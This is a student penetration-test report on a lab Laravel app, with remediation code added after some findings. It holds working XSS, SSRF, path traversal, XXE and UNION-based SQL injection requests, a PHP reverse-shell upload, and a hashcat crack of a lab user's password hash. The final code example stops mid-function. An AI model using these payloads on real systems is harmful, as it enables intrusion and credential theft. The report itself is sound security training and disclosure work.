EHA-HW1 berbejan

Vulnerability Report

Finding 1: Stored XSS Vulnerability (MEDIUM)

  • Category: Stored Cross-Site Scripting (XSS)

  • Severity: Medium

  • Location: http://[IP OF SERVER]/chat

  • Description:

    • Steps to Reproduce:
      1. Insert the string <img src onerror=alert(1)> into the message box at http://[IP OF SERVER]/chat.
      2. A JavaScript alert pops up every time the chat is opened, until the message is deleted.
    • Proof of Concept:

      <img src onerror=alert(1)>
      
  • Impact:

    • The stored XSS vulnerability allows attackers to inject malicious scripts into the application, potentially leading to session hijacking, data theft, etc.
    • In this case, an attacker can execute arbitrary JavaScript in the context of every other user accessing the chat, so anyone who simply opens the chat tab is affected.
  • Recommendation:

CVSS Score: 5.4 (Medium) CWE-79: Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’)


Finding 2: Reflected XSS Vulnerability (MEDIUM)

  • Category: Reflected Cross-Site Scripting (XSS)

  • Severity: Medium

  • Location: http://[IP OF SERVER]/login?redirect=

  • Description:

    • Proof of Concept:
      http://[IP OF SERVER]/login?redirect="><script%3Ealert(1)</script>
      
  • Impact:

    • The reflected XSS vulnerability allows attackers to inject malicious scripts into the application, potentially leading to session hijacking, data theft, or defacement.
    • In this case, an attacker must induce users to trigger the payload themselves, for example by getting them to click a crafted link or by placing such links on an attacker-controlled website.
  • Recommendation:

CVSS Score: 5.4 (Medium) CWE-79: Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’)
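The following is an added example, not code from the original report or from the tested application, showing the two server-side controls that close Findings 1 and 2: chat messages are HTML-escaped before they are placed in a page, and the login `redirect` parameter is validated as a same-site path and escaped when it is reflected. The function names, the HTML fragments and the sample messages are assumptions constructed for the example.

```python
"""Output encoding for the chat (Finding 1) and validation plus encoding of the
reflected redirect parameter (Finding 2). Added example; names are assumed."""
import html
from urllib.parse import urlsplit

# Constructed sample inputs: the report's stored payload and a benign message.
STORED_PAYLOAD = "<img src onerror=alert(1)>"
BENIGN_MESSAGE = "see you at 5 <3"


def render_chat_message(author: str, message: str) -> str:
    """Return an HTML fragment with every user-controlled value escaped.
    html.escape turns < > & " ' into entities, so markup inside `message`
    is displayed literally instead of being parsed as a tag."""
    return '<li class="msg"><b>{}</b>: {}</li>'.format(
        html.escape(author, quote=True), html.escape(message, quote=True))


def safe_redirect_target(raw: str, default: str = "/") -> str:
    """Accept only an absolute path on this site as a redirect target.
    Rejects a scheme or host (open redirect), protocol-relative '//host',
    backslashes and control characters; anything odd falls back to `default`."""
    if not raw or len(raw) > 2048:
        return default
    if any(ord(c) < 0x20 or c in "\\\x7f" for c in raw):
        return default
    try:
        parts = urlsplit(raw)
    except ValueError:  # e.g. malformed IPv6 literal
        return default
    if parts.scheme or parts.netloc:  # http://..., //evil.example
        return default
    if not raw.startswith("/") or raw.startswith("//"):
        return default
    return raw


def render_login_form(redirect_param: str) -> str:
    """Reflect the validated redirect target inside an attribute, escaped.
    The escaping is what stops '"><script>...' from closing the attribute;
    the validation stops the value from being an off-site URL."""
    target = safe_redirect_target(redirect_param)
    return ('<form method="post" action="/login">'
            '<input type="hidden" name="redirect" value="{}">'
            '</form>').format(html.escape(target, quote=True))
```

Escaping at output time is the control that matters for both findings; the redirect validation is an extra check because the same parameter would otherwise also be an open redirect.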


Finding 3: Server-Side Request Forgery (SSRF) Vulnerability (HIGH)

  • Category: Server-Side Request Forgery (SSRF)

  • Severity: High

  • Location: http://[IP OF SERVER]/api/load?resource=

  • Description:

    • Proof of Concept:

      GET /api/load?resource=http://localhost HTTP/1.1
      Host: [IP OF SERVER]
      User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
      Accept: */*
      Accept-Language: en-US,en;q=0.5
      Accept-Encoding: gzip, deflate, br
      Referer: http://[IP OF SERVER]/blog
      Connection: close
      Cookie: laravel_session=[your laravel_session cookie value]
      
  • Impact:

    • The SSRF vulnerability allows attackers to make arbitrary requests on behalf of the server, potentially leading to data exposure, server-side attacks, or access to internal services.
    • In this case, an attacker can exploit the vulnerability to reach services on the server's private local interface (here http://localhost), which are not reachable from outside.
  • Recommendation:

CVSS Score: 8.6 (High) CWE-918: Server-Side Request Forgery (SSRF)
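As an added example (not code from the original report or the tested application), here is a validator for the `resource` parameter of `/api/load` that refuses the request in Finding 3 before any connection is made. It allows only http(s) URLs whose host resolves exclusively to public addresses, so `localhost`, loopback, RFC 1918 and link-local targets are rejected. The `resolve` parameter is an assumption that lets the check run offline against a constructed resolver; by default it uses DNS.

```python
"""Allow-by-default-deny validation of an outbound URL (SSRF, Finding 3).
Added example; function names and the resolver hook are assumptions."""
import ipaddress
import socket
from typing import Callable, Iterable
from urllib.parse import urlsplit


def default_resolver(host: str) -> list:
    """Resolve `host` to every IP address a client could connect to."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def is_public_address(ip: str) -> bool:
    """True only for globally routable unicast addresses. is_global is False
    for loopback, private, link-local (incl. 169.254.0.0/16), reserved and
    unspecified ranges, which covers the usual SSRF targets."""
    addr = ipaddress.ip_address(ip)
    return addr.is_global and not addr.is_multicast


def validate_resource_url(url: str,
                          resolve: Callable[[str], Iterable[str]] = default_resolver) -> str:
    """Return a reason string if `url` must be rejected, or '' if acceptable."""
    try:
        parts = urlsplit(url)
        host, port = parts.hostname, parts.port  # .port raises on 'host:abc'
    except ValueError:
        return "malformed URL"
    if parts.scheme not in ("http", "https"):
        return "scheme {!r} not allowed".format(parts.scheme)
    if parts.username or parts.password:
        return "credentials in URL not allowed"
    if not host:
        return "missing host"
    if host == "localhost" or host.endswith(".localhost"):
        return "localhost not allowed"
    if port not in (None, 80, 443):
        return "port {} not allowed".format(port)
    # A literal IP is checked directly. Forms ip_address() rejects (e.g.
    # '127.1' or hex notation) fall through to the resolver, which expands
    # them the same way the HTTP client would, so they cannot slip past.
    try:
        ips = [str(ipaddress.ip_address(host))]
    except ValueError:
        try:
            ips = list(resolve(host))
        except (socket.gaierror, OSError):
            return "host does not resolve"
    if not ips:
        return "host does not resolve"
    for ip in ips:
        if not is_public_address(ip):
            return "host resolves to non-public address {}".format(ip)
    return ""
```

Every address the name resolves to must be public (a name that returns one public and one loopback address is rejected), and the HTTP client should connect to the address that was checked rather than resolving the name a second time; otherwise a DNS answer that changes between the check and the request would bypass the validation. Redirects returned by the fetched resource need the same check applied to each hop.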


Finding 4: Authorization Vulnerability Allowing File Listing (MEDIUM)

  • Category: Authorization Bypass

  • Severity: Medium

  • Location: http://[IP OF SERVER]/api/gallery

  • Description:

    • Steps to Reproduce:
      1. Replace /etc/passwd in the request below with the path you want to read and send the request.
      2. Base64-decode the response.
    • Proof of Concept:

      GET /api/gallery/..//..//..///..////..///..///etc/passwd HTTP/1.1
      Host: [IP OF SERVER]
      User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
      Accept-Language: en-US,en;q=0.5
      Accept-Encoding: gzip, deflate, br
      Referer: http://[IP OF SERVER]/gallery
      Connection: close
      Cookie: laravel_session=[your laravel_session cookie value]
      Upgrade-Insecure-Requests: 1
      
  • Impact:

    • The authorization vulnerability allows normal app users to list sensitive files on the server, exposing confidential information or facilitating further attacks.
    • In this case, an attacker can enumerate system files and gather information about the server's configuration and directory structure, /etc/passwd in this example.
  • Recommendation:

    • Implement proper access controls to restrict unauthorized access to sensitive endpoints and files.
    • Ensure that file listing functionality is properly restricted to authorized users only.
    • Filter path traversal sequences (../) in the requested path and restrict access to server files.
    • Avoid passing user input directly to filesystem APIs.
    • PortSwigger prevention, Snyk prevention

CVSS Score: 5.4 (Medium) CWE-22: Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)
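An added example (not the report's or the application's code) of the check the `/api/gallery` handler in Finding 4 is missing: the user-supplied path is joined to the gallery directory, normalised, and refused unless the result is still inside that directory. The gallery root and the function name are assumptions; the request path from the report is used as a constructed test input.

```python
"""Confine a client-supplied path to one directory (path traversal, Finding 4).
Added example; GALLERY_ROOT and the function name are assumed."""
import os
from pathlib import Path

GALLERY_ROOT = Path("/var/www/laravel/storage/app/gallery")  # assumed base dir


def resolve_gallery_path(user_path: str, root: Path = GALLERY_ROOT) -> Path:
    """Return an absolute path inside `root` for `user_path`, or raise ValueError.

    The check is lexical (os.path.normpath), so it needs no filesystem access
    and behaves identically in tests and on the server: repeated slashes and
    every '.'/'..' segment are collapsed first, then the result must still
    start with the root. Percent-decoding must already have happened, as the
    web framework does before the handler sees the path.
    """
    if "\x00" in user_path:
        raise ValueError("NUL byte in path")
    # The client never gets to choose an absolute path; treat it as relative.
    relative = user_path.lstrip("/")
    candidate = os.path.normpath(os.path.join(str(root), relative))
    root_str = os.path.normpath(str(root))
    if candidate != root_str and not candidate.startswith(root_str + os.sep):
        raise ValueError("path escapes gallery root: {!r}".format(user_path))
    return Path(candidate)
```

Because the comparison is lexical, a symbolic link inside the gallery that points elsewhere would still be followed when the file is opened; if the directory can contain links, repeat the same prefix check on `os.path.realpath(candidate)` at open time.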


Finding 5: SQL Injection Vulnerability Allowing Database Enumeration And Data Leak (CRITICAL)

  • Category: SQL Injection

  • Severity: Critical

  • Location: http://[IP OF SERVER]/api/chat

  • Description:

    • Proof of Concept: I know that in a normal business environment this exploit would go too far, since I would not want to pull everything from the customer database, but it was good training for the homework. This set of payloads enumerates the whole database, leading to a listing of all user data. In this example I retrieve every user's email and (hashed) password, which can later be cracked (see Finding 8).

      1. Enumerate the column count of the current table, which the following attacks need. ORDER BY 6 is the first number (counting up from 1) that throws an internal server error, so the current table has 5 columns.

      GET /api/chat/1%20order%20by%206# HTTP/1.1
      Host: [IP OF SERVER]
      User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
      Accept-Language: en-US,en;q=0.5
      Accept-Encoding: gzip, deflate, br
      Connection: close
      Cookie: laravel_session=[your laravel_session cookie value]; 
      Upgrade-Insecure-Requests: 1
      
      2. Next we can use UNION SELECT statements. First we need the name of the database currently in use; in our case it is laravel.

      GET /api/chat/1%20union%20select%201,2,3,4,database()# HTTP/1.1
      Host: [IP OF SERVER]
      User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
      Accept-Language: en-US,en;q=0.5
      Accept-Encoding: gzip, deflate, br
      Connection: close
      Cookie: laravel_session=[your laravel_session cookie value]; 
      Upgrade-Insecure-Requests: 1        
      
      3. With the database name we can list every table in that database. We now focus on the table users.

      GET /api/chat/1%20union%20select%201,2,3,4,group_concat(0x7c,table_name,0x7C)%20from%20information_schema.tables%20wheRe%20table_schema='laravel'# HTTP/1.1
      Host: [IP OF SERVER]
      User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
      Accept-Language: en-US,en;q=0.5
      Accept-Encoding: gzip, deflate, br
      Connection: close
      Cookie: laravel_session=[your laravel_session cookie value]; 
      Upgrade-Insecure-Requests: 1
      
      4. With the table names we can enumerate the column names of each table. This payload targets the email and password columns.

      GET /api/chat/1%20union%20select%201,2,3,4,gRoUp_cOncaT(0x7c,column_name,0x7c)%20fRoM%20information_schema.columns%20where%20table_name='users'# HTTP/1.1
      Host: [IP OF SERVER]
      User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
      Accept-Language: en-US,en;q=0.5
      Accept-Encoding: gzip, deflate, br
      Connection: close
      Cookie: laravel_session=[your laravel_session cookie value]; 
      Upgrade-Insecure-Requests: 1
      
      5. Finally, any data can be listed from the table:

      GET /api/chat/1%20union%20select%201,2,3,4,gRoUp_cOncaT(0x7c,email,0x7c,password,0x7c)%20fRoM%20users# HTTP/1.1
      Host: [IP OF SERVER]
      User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
      Accept-Language: en-US,en;q=0.5
      Accept-Encoding: gzip, deflate, br
      Connection: close
      Cookie: laravel_session=[your laravel_session cookie value]; 
      Upgrade-Insecure-Requests: 1
      
  • Impact:

    • The SQL injection vulnerability allows attackers to execute arbitrary SQL queries on the application's database through the API, leading to data exfiltration.
    • In this case, an attacker can enumerate database contents, such as table contents, including user data, allowing further exploitation.
  • Recommendation:

CVSS Score: 9.8 (Critical) CWE-89: Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’)
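To make the root cause of Finding 5 concrete, here is an added example (not the report's or the application's code) of the message lookup behind `/api/chat/{id}` written two ways against an in-memory SQLite database with constructed data. The string-concatenated version accepts the report's UNION payload and returns rows from the `users` table; the parameterised version cannot, because the driver sends the value separately from the statement. The table and column names are assumptions; the payload is adapted to SQLite syntax (`--` comment, `||` concatenation) from the MySQL form in the report.

```python
"""Vulnerable vs. parameterised query for the chat endpoint (SQLi, Finding 5).
Added example with constructed data; schema and names are assumed."""
import sqlite3

DB = sqlite3.connect(":memory:")
DB.executescript("""
    CREATE TABLE messages (id INTEGER, user_id INTEGER, body TEXT, created TEXT, extra TEXT);
    CREATE TABLE users (id INTEGER, email TEXT, password TEXT);
    INSERT INTO messages VALUES (1, 7, 'hello', '2024-01-01', NULL);
    INSERT INTO users VALUES (7, 'alice@localhost', '$2y$10$constructedhash');
""")

# The report's final payload, URL-decoded and translated to SQLite syntax.
# Five selected columns match the five columns of `messages`, which is why
# the report first had to find the column count with ORDER BY.
PAYLOAD = ("1 union select 1,2,3,4,"
           "group_concat('|'||email||'|'||password||'|') from users --")


def get_message_vulnerable(raw_id: str):
    """String concatenation: the id parameter becomes part of the SQL text,
    so an id of '1 union select ...' changes the statement's structure."""
    sql = "SELECT * FROM messages WHERE id = " + raw_id
    return DB.execute(sql).fetchall()


def get_message_safe(raw_id: str):
    """Parameterised query: the value is bound, never parsed as SQL. Validating
    the id as an integer up front also turns 'order by 6' probing into a clean
    client error instead of the internal server error the report relied on."""
    if not raw_id.isdigit():
        raise ValueError("id must be an integer")
    return DB.execute("SELECT * FROM messages WHERE id = ?", (int(raw_id),)).fetchall()
```

In a Laravel code base the equivalent of `get_message_safe` is the query builder or Eloquent with bound parameters; the pattern to look for in review is any `DB::select`/`DB::raw` call that interpolates a request value into the SQL string.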


Finding 6: XML External Entity (XXE) Vulnerability Allowing File Access (HIGH)

  • Category: XML External Entity (XXE)

  • Severity: High

  • Location: http://[IP OF SERVER]/api/calculator

  • Description:

    • Proof of Concept:

      POST /api/calculator HTTP/1.1
      Host: [IP OF SERVER]
      User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
      Accept: */*
      Accept-Language: en-US,en;q=0.5
      Accept-Encoding: gzip, deflate, br
      Referer: http://[IP OF SERVER]/calculator
      Content-Type: application/xml
      Origin: http://[IP OF SERVER]
      Content-Length: [length]
      Connection: close
      Cookie: laravel_session=[your laravel_session cookie value]
      
      <?xml version="1.0" encoding="UTF-8"?>
      <!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
      <bmi>
          <height>&xxe;</height>
          <weight>80</weight>
      </bmi>
      

      or, to receive the file base64-encoded through a PHP stream filter:

      <?xml version="1.0" encoding="UTF-8"?>
      <!DOCTYPE foo [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd"> ]>
      <bmi>
          <height>&xxe;</height>
          <weight>80</weight>
      </bmi>
      

      and base64-decode the response.

  • Impact:

    • The XXE vulnerability allows attackers to read arbitrary files on the server’s filesystem, potentially exposing sensitive information or facilitating further attacks.
    • In this case, an attacker can access system files, such as /etc/passwd, which may contain user credentials or other sensitive data, leading to further compromise.
    • We were even able to find the database login and password in plain text. The password is the same as the admin account's, as discussed in the bonus finding (Finding 11).
  • Recommendation:

    • Disable external entity parsing or use safe XML processing libraries that mitigate XXE vulnerabilities.
    • Implement proper input validation and sanitization to prevent XML injection attacks.
    • PortSwigger XXE prevention, OWASP cheatsheet

CVSS Score: 7.2 (High) CWE-611: Improper Restriction of XML External Entity Reference
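The following is an added example, not code from the report or from the application, of how the `/api/calculator` endpoint in Finding 6 can parse its BMI document safely: any document carrying a DOCTYPE or ENTITY declaration is refused before the bytes reach the XML parser, only UTF-8 is accepted so the textual check cannot be bypassed with another encoding, and the two fields are validated as numbers. The element names follow the report's PoC; the function and exception names are assumptions, and the XXE payload is used as a constructed test input.

```python
"""Hardened parsing of the <bmi> request (XXE, Finding 6).
Added example; names are assumed."""
import re
import xml.etree.ElementTree as ET

# DOCTYPE is the only place an ENTITY can be declared, so rejecting it rules
# out both internal and external DTD subsets. Case-insensitive as belt and braces.
_DOCTYPE_RE = re.compile(rb"<!DOCTYPE", re.IGNORECASE)
_ENTITY_RE = re.compile(rb"<!ENTITY", re.IGNORECASE)
MAX_BODY = 4096


class RejectedXML(ValueError):
    """Raised for documents that fail the pre-parse policy or schema checks."""


def parse_bmi_request(body: bytes) -> dict:
    """Return {'height': float, 'weight': float} or raise RejectedXML."""
    if not body or len(body) > MAX_BODY:
        raise RejectedXML("empty or oversized body")
    # A UTF-16 document would hide '<!DOCTYPE' from a byte regex; accept UTF-8 only.
    if body.startswith((b"\xff\xfe", b"\xfe\xff")):
        raise RejectedXML("only UTF-8 documents are accepted")
    if _DOCTYPE_RE.search(body) or _ENTITY_RE.search(body):
        raise RejectedXML("DTD/ENTITY declarations are not accepted")
    try:
        root = ET.fromstring(body)
    except ET.ParseError as exc:
        raise RejectedXML("malformed XML: {}".format(exc)) from None
    if root.tag != "bmi":
        raise RejectedXML("unexpected root element")
    values = {}
    for field in ("height", "weight"):
        node = root.find(field)
        if node is None or node.text is None:
            raise RejectedXML("missing <{}>".format(field))
        try:
            values[field] = float(node.text.strip())
        except ValueError:
            raise RejectedXML("<{}> must be numeric".format(field)) from None
        if not 0 < values[field] < 1000:
            raise RejectedXML("<{}> out of range".format(field))
    return values
```

In PHP the corresponding rule is to never pass `LIBXML_NOENT` to `simplexml_load_string` or `DOMDocument::loadXML`, since that flag is what turns entity references into their (possibly external) content; the DOCTYPE rejection above is cheap insurance on top of that.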


Finding 7: File Upload Vulnerability Allowing Unrestricted File Upload (HIGH/CRITICAL)

  • Category: File Upload Vulnerability

  • Severity: High/Critical

  • Location: http://[IP OF SERVER]/api/gallery (POST)

  • Description:

    • Proof of Concept: Simply change the Content-Type to image/jpeg and almost any file can be uploaded. Some extensions are filtered by the server, e.g. .php, but .php5 is accepted like any other.

      POST /api/gallery HTTP/1.1
      Host: [IP OF SERVER]
      User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
      Accept: */*
      Accept-Language: en-US,en;q=0.5
      Accept-Encoding: gzip, deflate, br
      Referer: http://[IP OF SERVER]/gallery
      Content-Type: multipart/form-data; boundary=---------------------------292047434216616372382482965518
      Origin: http://[IP OF SERVER]
      Content-Length: 5720
      Connection: close
      Cookie: laravel_session=fnyDCf
      
      -----------------------------292047434216616372382482965518
      Content-Disposition: form-data; name="photo"; filename="shell.php5"
      Content-Type: image/jpeg
      
      <?php
      // php-reverse-shell - A Reverse Shell implementation in PHP
      // Copyright (C) 2007 pentestmonkey@pentestmonkey.net
      //
      // This tool may be used for legal purposes only.  Users take full responsibility
      // for any actions performed using this tool.  The author accepts no liability
      // for damage caused by this tool.  If these terms are not acceptable to you, then
      // do not use this tool.
      (...)
      ?>
      
      1. Click the upload button and upload your file, renamed to have a .jpg ending (or send the request directly to the API).
      2. Intercept the request with e.g. Burp Suite.
      3. Change the Content-Type value to image/jpeg, remove the .jpg ending and add the extension you want that the server does not filter.
      4. Send the request.
      5. The file is successfully uploaded to the server (base64-decoding the response shows the stored shell.php5 file). It is also possible to name the file ../../../../something to traverse paths and store it in e.g. /var/www/laravel/storage/app instead of /var/www/laravel/storage/app/gallery, so the storage location can be manipulated to some degree.
  • Impact:

    • The file upload vulnerability allows an attacker to upload malicious files to the server, potentially leading to remote code execution or a reverse shell.
    • In this case, an attacker can upload a PHP shell script and possibly gain unauthorized access to the server, execute commands, and manipulate files.
    • In the case of this web app I wasn't able to execute the uploaded files. However, the file's location is visible after upload, and if an attacker becomes able to run the files this leads to the problems mentioned above, for example if a future update adds a feature that includes or executes local scripts or files.
  • Recommendation:

    • Implement strict validation checks on file uploads, including file type verification and content scanning for malicious payloads.
    • Store uploaded files in a separate, non-executable directory with restricted permissions to prevent direct execution.
    • OWASP file upload prevention, PortSwigger prevention

CVSS Score: 8.6 (High) CWE-434: Unrestricted Upload of File with Dangerous Type
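Here is an added example (not the report's or the application's code) of the server-side upload checks the recommendation for Finding 7 calls for. The client's filename and Content-Type are treated as untrusted: the extension must be on a short allowlist (not a denylist, which is how `.php5` got through), the file's leading bytes must match that type, and the stored name is generated server-side so neither `shell.php5` nor a `../../` prefix can influence where or how the file is written. The allowlist, size limit and sample inputs are constructed for the example.

```python
"""Allowlist-based validation of an image upload (Finding 7).
Added example; limits and names are assumed."""
import os
import secrets

ALLOWED = {
    # extension: (MIME type to serve it as, accepted magic-byte prefixes)
    "jpg": ("image/jpeg", (b"\xff\xd8\xff",)),
    "png": ("image/png", (b"\x89PNG\r\n\x1a\n",)),
    "gif": ("image/gif", (b"GIF87a", b"GIF89a")),
}
MAX_BYTES = 5 * 1024 * 1024


class UploadRejected(ValueError):
    pass


def validate_upload(client_filename: str, data: bytes, client_content_type: str) -> tuple:
    """Return (stored_name, mime, content_type_mismatch) for an acceptable image,
    otherwise raise UploadRejected. The client's Content-Type plays no part in
    the decision; it is only compared afterwards so spoofed requests can be logged."""
    if not data or len(data) > MAX_BYTES:
        raise UploadRejected("empty or oversized upload")
    # Drop any directory component the client sent ('../../x.jpg' -> 'x.jpg').
    base = os.path.basename(client_filename.replace("\\", "/"))
    if "\x00" in base:
        raise UploadRejected("NUL in filename")
    # Judge only the final extension: that is what the web server would act on
    # for both 'shell.php5' and 'shell.jpg.php5'.
    ext = base.rsplit(".", 1)[-1].lower() if "." in base else ""
    if ext == "jpeg":
        ext = "jpg"
    if ext not in ALLOWED:
        raise UploadRejected("extension {!r} not allowed".format(ext))
    mime, magics = ALLOWED[ext]
    if not any(data.startswith(m) for m in magics):
        raise UploadRejected("content does not match the {} format".format(ext))
    mismatch = client_content_type.strip().lower() != mime
    # Random server-chosen name: no user-controlled characters reach the filesystem.
    stored = "{}.{}".format(secrets.token_hex(16), ext)
    return stored, mime, mismatch
```

The magic-byte check blocks PHP source sent under a `.jpg` name, and the generated name removes the double-extension and traversal cases at once; storing the result outside the document root, as the recommendation says, is the remaining layer.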

Finding 8: Lack of Password Complexity Requirements (LOW)

  • Category: Authentication
  • Severity: Low
  • Location: http://[IP OF SERVER]/register
  • Description:
    • Observation:

      • The application does not enforce password complexity requirements such as character types (e.g., uppercase, lowercase, special characters) or password expiration; only a minimum length of 8 characters is enforced.
    • Impact:

      • Lack of password complexity requirements increases the likelihood of weak passwords being used, which makes brute-force attacks, credential stuffing, or password guessing easier.
      • This can be shown with a wordlist attack against a customer's password hash acquired through the SQL injection attack (Finding 5).
    • Proof of concept:

      marisa.raynold@localhost has the password hash $2y$10$tsvphy17y4w4RvQ3hk/Q/OUI4iHvoLPS/An1qrJwyX0Ykse06eDrK (the \/ sequences in the API response are JSON escaping of /). Running hashcat -m 3200 -a 0 \$2y\$10\$tsvphy17y4w4RvQ3hk\/Q\/OUI4iHvoLPS\/An1qrJwyX0Ykse06eDrK rockyou.txt recovers the password in a matter of seconds: pokemon.

    • Recommendation:

      • Implement a password policy that includes requirements for character complexity and regular password expiration to enhance the security of user accounts.
      • Educate users about the importance of choosing strong passwords and provide guidance on creating secure passwords.
      • OWASP authentication cheatsheet including password complexity

CVSS Score: 3.1 (Low) CWE-521: Weak Password Requirements

Finding 9: Session Fixation Vulnerability (MEDIUM)

  • Category: Session Management
  • Severity: Medium
  • Location: http://[IP OF SERVER]/login
  • Description:
    • Proof of Concept:

      • An attacker can perform a session fixation attack by forcing a user to use a specific session identifier, typically by providing them with a valid session ID.
      • After the user logs in using the provided session ID, the attacker can hijack the session and gain unauthorized access to the user’s account.
    • Impact:

      • The vulnerability allows attackers to hijack user sessions, potentially gaining unauthorized access to sensitive information, performing actions on behalf of the user, or conducting further attacks.
    • Proof of Concept:

      1. The attacker generates their own session by logging in.
      2. The user logs in with the laravel_session cookie set to the attacker's value.
      3. After the victim logs in, the attacker refreshes the page and has the victim's full session.
    • Recommendation:

      • Implement secure session management practices, including session token regeneration upon authentication, session expiration, and secure transmission of session identifiers.
      • Use random, unpredictable session identifiers to prevent fixation attacks and ensure the uniqueness of session tokens for each user session.
      • AppSec monkey prevention blog, University of Toronto prevention tips

CVSS Score: 5.8 (Medium) CWE-384: Session Fixation
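As an added example (not code from the report or from the application), the session store below shows the regeneration step that Finding 9's recommendation asks for: whatever session id the browser presents at login is discarded and a fresh, server-generated id is issued, so an id planted by an attacker never becomes the victim's authenticated session. The store, the idle timeout and the injectable clock are assumptions made so the three steps of the PoC can be replayed offline.

```python
"""Session id rotation on authentication (session fixation, Finding 9).
Added example; store layout, timeout and names are assumed."""
import secrets
import time
from dataclasses import dataclass
from typing import Callable, Dict, Optional

IDLE_TIMEOUT = 30 * 60  # seconds of inactivity before a session is dropped


@dataclass
class Session:
    user: Optional[str]
    last_seen: float


class SessionStore:
    def __init__(self, clock: Callable[[], float] = time.time):
        self._clock = clock
        self._sessions: Dict[str, Session] = {}

    @staticmethod
    def new_id() -> str:
        """256 bits from the OS CSPRNG; unguessable, so the only way for an
        attacker to know a victim's id is to have chosen it, which login prevents."""
        return secrets.token_urlsafe(32)

    def get(self, sid: Optional[str]) -> Optional[Session]:
        """Look up a session; unknown, forged and expired ids all return None."""
        if not sid:
            return None
        s = self._sessions.get(sid)
        if s is None:
            return None
        if self._clock() - s.last_seen > IDLE_TIMEOUT:
            self._sessions.pop(sid, None)
            return None
        s.last_seen = self._clock()
        return s

    def start_anonymous(self) -> str:
        sid = self.new_id()
        self._sessions[sid] = Session(user=None, last_seen=self._clock())
        return sid

    def login(self, presented_sid: Optional[str], user: str) -> str:
        """Authenticate `user` and return the id to set in the cookie.
        The presented id is invalidated (never upgraded) and a new one issued;
        in Laravel this is $request->session()->regenerate() after Auth succeeds.
        An unknown presented id is simply ignored: the server never adopts a
        client-chosen identifier."""
        if presented_sid in self._sessions:
            del self._sessions[presented_sid]
        sid = self.new_id()
        self._sessions[sid] = Session(user=user, last_seen=self._clock())
        return sid

    def logout(self, sid: Optional[str]) -> None:
        self._sessions.pop(sid, None)
```

Rotating the id at the privilege change is the whole defence; marking the cookie `HttpOnly` and `Secure` limits how an id can be planted in the first place but does not replace the rotation.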

Finding 10: Vulnerability Allowing Dictionary/Brute Force Attack with Delay (HIGH)

  • Category: Authentication
  • Severity: High
  • Location: http://[IP OF SERVER]/login
  • Description:
    • Exploit:

      • An attacker can conduct a dictionary or brute force attack against the login page by sending login requests with different username/password combinations.
      • By incorporating a 15-second delay between login attempts, the attacker can evade rate-limiting mechanisms and bypass account lockout protections.
      • Additionally, the attacker can differentiate successful login attempts from failed ones by analyzing variations in the application’s responses.
    • Proof of Concept: Here you can see a successful test with Burp Suite Intruder. As noted in the exploit section, a successful login and a failed login produce different responses, and this difference is what I use in Intruder to determine the outcome of each attempt. Left is the successful response and right the failed one (which includes /login?redirect=s).

    • Impact:

      • The vulnerability enables attackers to systematically guess credentials, potentially leading to unauthorized access to user accounts, data breaches, or further compromise of the system.
    • Recommendation:

      • Implement effective rate-limiting mechanisms to prevent excessive login attempts and enforce account lockout policies.
      • Use CAPTCHA challenges or multi-factor authentication (MFA) to add an additional layer of security against automated attacks.
      • Monitor login attempts for suspicious patterns and implement anomaly detection mechanisms to identify and mitigate brute force attacks.
      • OWASP authentication cheatsheet including password complexity

CVSS Score: 8.5 (High) CWE-307: Improper Restriction of Excessive Authentication Attempts
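The report notes that a 15-second spacing between attempts evades the application's rate limiting. The added example below (not code from the report or the application) replays a constructed stream of spaced failed logins against two throttles: a naive requests-per-minute limiter, which the spacing defeats, and a consecutive-failure lockout, which stops the stream after a handful of attempts regardless of spacing. The thresholds, the key scheme and the injectable clock are assumptions.

```python
"""Why spaced attempts beat a per-minute limiter but not a failure lockout
(brute force, Finding 10). Added example; thresholds are assumed."""
from collections import defaultdict, deque
from typing import Callable, List, Tuple


class PerMinuteLimiter:
    """Naive: allow at most `limit` attempts per key in any `window` seconds.
    Blind to outcome, so slow failures are indistinguishable from normal use."""
    def __init__(self, clock: Callable[[], float], limit: int = 5, window: float = 60.0):
        self.clock, self.limit, self.window = clock, limit, window
        self.hits = defaultdict(deque)

    def permitted(self, key: str) -> bool:
        now, q = self.clock(), self.hits[key]
        while q and now - q[0] >= self.window:
            q.popleft()
        return len(q) < self.limit

    def record(self, key: str, success: bool) -> None:
        self.hits[key].append(self.clock())


class FailureLockout:
    """Count consecutive failures per key however they are spaced; after
    `max_failures` refuse attempts for `lock_seconds`. A success resets."""
    def __init__(self, clock: Callable[[], float], max_failures: int = 5, lock_seconds: float = 900.0):
        self.clock, self.max_failures, self.lock_seconds = clock, max_failures, lock_seconds
        self.failures = defaultdict(int)
        self.locked_until = defaultdict(float)

    def permitted(self, key: str) -> bool:
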